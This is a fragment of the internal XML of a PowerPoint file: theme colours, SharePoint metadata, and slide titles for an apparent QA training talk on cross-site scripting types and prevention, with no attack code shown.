              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthorized access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reputation loss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1221963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Itera_Consulting_ppt">
  <a:themeElements>
    <a:clrScheme name="Itera Consulting">
      <a:dk1>
        <a:srgbClr val="373737"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="5B8F22"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="92D400"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="92D400"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="5B8F22"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="CED5DD"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8996A0"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="373737"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="CA005D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blank">
  <a:themeElements>
    <a:clrScheme name="Custom 4">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="D7090C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E6E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="414042"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D7090C"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="696A6D"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="8C8E91"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="AFB1B4"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="D5D6D8"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0000FF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="800080"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Office klassis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4140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41404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7A34D0EAA0C341B924D209DDAD69AA" ma:contentTypeVersion="5" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="5f2900e9561155ad8fdf24d5678a975a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="ced56de7-f0ac-49f3-8192-9090e7fc0e31" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b20e8e601cb5676b213fbe50467b91d4" ns2:_="">
    <xsd:import namespace="ced56de7-f0ac-49f3-8192-9090e7fc0e31"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:Description0" minOccurs="0"/>
                <xsd:element ref="ns2:Tags" minOccurs="0"/>
                <xsd:element ref="ns2:Area" minOccurs="0"/>
                <xsd:element ref="ns2:Folder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d56de7-f0ac-49f3-8192-9090e7fc0e31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>
      <xsd:simpleType>
        <xsd:restriction base="dms:Text">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Tags" ma:index="9" nillable="true" ma:displayName="Tags" ma:internalName="Tags">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Area" ma:index="10" nillable="true" ma:displayName="Area" ma:internalName="Area">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Folder" ma:index="11" nillable="true" ma:displayName="Folder" ma:internalName="Folder">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="Status" ma:index="12" nillable="true" ma:displayName="Status" ma:default="Initial" ma:format="Dropdown" ma:internalName="Status">
      <xsd:simpleType>
        <xsd:restriction base="dms:Choice">
          <xsd:enumeration value="Initial"/>
          <xsd:enumeration value="Draft"/>
          <xsd:enumeration value="In Progress"/>
          <xsd:enumeration value="Under review"/>
          <xsd:enumeration value="Need corrections"/>
          <xsd:enumeration value="Final"/>
          <xsd:enumeration value="Outdate"/>
          <xsd:enumeration value="Cancell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Description0 xmlns="ced56de7-f0ac-49f3-8192-9090e7fc0e31">Application Performance Monitoring Service Offering Presentation</Description0>
    <Status xmlns="ced56de7-f0ac-49f3-8192-9090e7fc0e31">Initial</Status>
    <Folder xmlns="ced56de7-f0ac-49f3-8192-9090e7fc0e31">Archived company presentations</Folder>
    <Area xmlns="ced56de7-f0ac-49f3-8192-9090e7fc0e31" xsi:nil="true"/>
    <Tags xmlns="ced56de7-f0ac-49f3-8192-9090e7fc0e31">!Ukraine </Tags>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{99FD7123-0970-4A86-BB57-8FB8895482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d56de7-f0ac-49f3-8192-9090e7fc0e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6FB7749-A4B2-4C19-9186-F790C184C9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71159E-39F4-40FE-A91E-2C3DE458B5A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ed56de7-f0ac-49f3-8192-9090e7fc0e31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34087</TotalTime>
  <Words>812</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>164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Wingdings</vt:lpstr>
      <vt:lpstr>Itera_Consulting_ppt</vt:lpstr>
      <vt:lpstr>blank</vt:lpstr>
      <vt:lpstr>Warning – you’ve been XSSed!</vt:lpstr>
      <vt:lpstr>Quick facts</vt:lpstr>
      <vt:lpstr>Please welcome – XSS!</vt:lpstr>
      <vt:lpstr>How it WORKS???</vt:lpstr>
      <vt:lpstr>XSS Types</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>DOM Based XSS</vt:lpstr>
      <vt:lpstr>How XSS can be used</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>How to prevent?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APM Service Offering</dc:title>
  <dc:subject>QA</dc:subject>
  <dc:creator>olga.zhestkova@gmail.com</dc:creator>
  <cp:lastModifiedBy>Yuriy Fedko</cp:lastModifiedBy>
  <cp:revision>958</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-06-02T15:46:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-02-26T10:11:35Z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ev by">
    <vt:lpwstr>addpoint.no</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x010100437A34D0EAA0C341B924D209DDAD69AA</vt:lpwstr>
  </property>
</Properties>
</file>